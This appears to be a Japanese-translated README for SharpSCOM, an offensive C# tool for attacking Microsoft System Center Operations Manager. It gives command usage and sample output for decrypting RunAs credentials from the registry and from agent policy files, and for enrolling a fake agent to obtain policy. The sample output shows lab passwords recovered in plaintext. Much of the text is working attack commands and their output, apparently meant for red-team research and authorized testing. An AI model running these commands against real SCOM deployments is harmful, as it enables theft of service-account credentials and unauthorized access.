
SCOMと対話するためのC#ユーティリティ
Microsoft System Center Operations Manager(SCOM)と連携するためのC#ツールです。
このツールは、SCOMサーバーバージョン 10.22.10118.0 に対してテスト済みです。
SSPI統合は、BSD-2ライセンスで公開されているKevin Thompson(antiduh)による nsspi ライブラリを介して提供されます。
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
Usage: SharpSCOM <command> [options]
Commands:
RegisterAgent Register a new agent with SCOM server
RegisterCertificate Assign a certificate to an existing agent
RequestPolicy Request policy from SCOM server
DownloadPolicy Download policy from SCOM server
AutoEnroll Send a multi-part request consisting of RegisterAgent, RegisterCertificate and RequestPolicy and attempt to automatically download the policy
DecryptPolicy Decrypt SecureData section from a policy file
DecryptRunAs Extract and decrypt RunAs credentials from registry
Common Options:
/hostname:<name> Computer hostname (default: current machine)
/managementgroup:<mg> SCOM management group name
/server:<server> SCOM server address
/port:<port> SCOM server port (default: 5723)
/outfile:<file> Output file path
/data:<base64> Base64-encoded data
/key:<xml> RSA private key in XML format
/verbose Enable verbose output
/help Show this help message
Examples:
SharpSCOM AutoEnroll /managementgroup:MG1 /server:scom.domain.com
SharpSCOM DecryptPolicy /data:<base64> /outfile:policy.xml
SharpSCOM DecryptRunAs
以下のコマンドは、現在SCOMに登録されているサーバー上で実行することを想定しています。RunAs資格情報が使用されていてサーバーに配布されている場合、以下のコマンドを使用して平文の資格情報を復元できます。
レジストリからRunAs資格情報を抽出して復号します(ローカル管理者権限が必要です):
SharpSCOM.exe decryptrunas
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
[+] Searching for RunAs credentials in registry...
[+] Found 4 credentials
Username: ludus\opsmgr_action
Password: Password123
Username: ludus\opsmgr_dataread
Password: Password123
Username: ludus\opsmgr_datawrite
Password: Password123
Username: ludus\runas_account
Password: SuperSecure!
[+] Completed
エージェントポリシーXMLファイルの SecureData セクションに格納されているRunAs資格情報を抽出して復号します。デフォルトでは、このファイルは C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Connector Configuration Cache\$MANAGEMENT_GROUP_NAME$\OpsMgrConnector.Config にあります。
このコマンドは、Local Machine\Microsoft Monitoring Agent ストアから現在のSCOM RunAs証明書を探し出し、関連付けられた秘密鍵を使用して復号します。
SharpSCOM DecryptPolicy /data:<base64-encrypted-data>
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
[+] Attempting to decrypt policy data...
[+] Using certificate from store
[+] Found certificate in Microsoft Monitoring Agent store
[+] Subject: O=Microsoft, OU=RunAs Account Encryption, CN=scom-db.ludus.domain
[+] Issuer: O=Microsoft, OU=RunAs Account Encryption, CN=scom-db.ludus.domain
[+] Thumbprint: 88D3E2AC575795E5F5F0E0C2EAFFB5FC386EA52F
[+] Key Size: 2048
[+] RSA key loaded successfully from certificate
[+] SecureData decrypted successfully!
<SecureStorageContainer><SecureStorageReferences><Added><SecureStorageReference Identity="63745834-3e54-936c-1b47-2d632054a177"><TargetSSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</TargetSSID></SecureStorageReference></Added><Removed /><Modified /></SecureStorageReferences><SecureStorageElements><Added><SecureStorageElement Type="WindowsCredential"><SSID>00C29753F0583B2A1D9D0D81DF24F0FBA31D72B17A00000000000000000000000000000000000000</SSID><Domain>ludus</Domain><UserName>runas_account</UserName><Password>UwB1AHAAZQByAFMAZQBjAHUAcgBlACEA</Password></SecureStorageElement><SecureStorageElement Type="ActionAccountCredential"><SSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</SSID><Domain>NT Authority</Domain><UserName>LocalSystem</UserName></SecureStorageElement></Added><Removed /><Modified /></SecureStorageElements></SecureStorageContainer>
現在SCOMに登録されていないドメイン参加済みホストを制御下に置いている場合、以下の要件を満たしていれば、デバイスの登録を試みてエージェントポリシーXMLファイルを要求できます。
要件:
新しいデバイスを登録するために、SCOMエージェントは以下の4つのメッセージをSCOMサーバーに送信します。
| コマンド | 説明 |
|---|---|
RegisterAgent | SCOMサーバーに新しいエージェントを登録します |
RegisterCertificate | 既存のエージェントに証明書を割り当てます |
RequestPolicy | SCOMサーバーにポリシーを要求します |
DownloadPolicy | SCOMサーバーからポリシーをダウンロードします |
テスト目的であれば、上記の各メッセージは、SharpSCOMの対応するコマンドを使用してSCOMサーバーに個別に送信することもできます。
注: SCOMサーバーは、これらのメッセージをマルチメッセージリクエストの一部としてまとめて受信することを想定しています。エージェントポリシーファイルを確実に受信するには、
AutoEnrollコマンドを使用する必要があります。このコマンドはRegisterAgent、RegisterCertificate、RequestPolicyコマンドをマルチパートメッセージとしてまとめて送信します。
AutoEnroll コマンドを送信すると、SCOMサーバーからの応答が自動的に解析され、エージェントポリシーXMLファイルをダウンロードするための最終的な DownloadPolicy メッセージの生成に使用されます。
SharpSCOM.exe autoenroll /managementgroup:SCOM1 /server:scom-om1.ludus.domain /hostname:fake1.ludus.domain /outfile:C:\Users\domainadmin\desktop\policy_new.xml
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1